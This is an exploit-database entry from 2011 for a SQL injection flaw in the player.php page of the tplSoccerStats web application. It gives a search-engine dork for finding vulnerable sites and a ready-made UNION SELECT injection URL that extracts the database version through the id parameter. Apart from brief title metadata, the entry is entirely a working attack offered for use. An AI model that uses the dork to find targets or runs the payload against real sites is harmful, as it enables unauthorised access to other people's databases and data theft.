[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : tplSoccerStats (player.php) SQL Injection Vulnerability
# Published : 2011-02-23
# Author : AtT4CKxT3rR0r1ST
# Previous Title : Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability
# Next Title : Hyena Cart (index.php) SQL Injection Vulnerability
tplSoccerStats (player.php) Sql Injection Vulnerability
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Dork : intitle:"Powered by tplSoccerStats" inurl:"player.php"
.:. Home : http://www.sec-risk.com/vb/
####################################################################
===[ Exploit ]===
www.site.com/player.php?id==null[Sql]
www.site.com/player.php?id=null'+and+1=2+union+select+1,2,3,version(),5,6,7,8,9,10-- -
####################################################################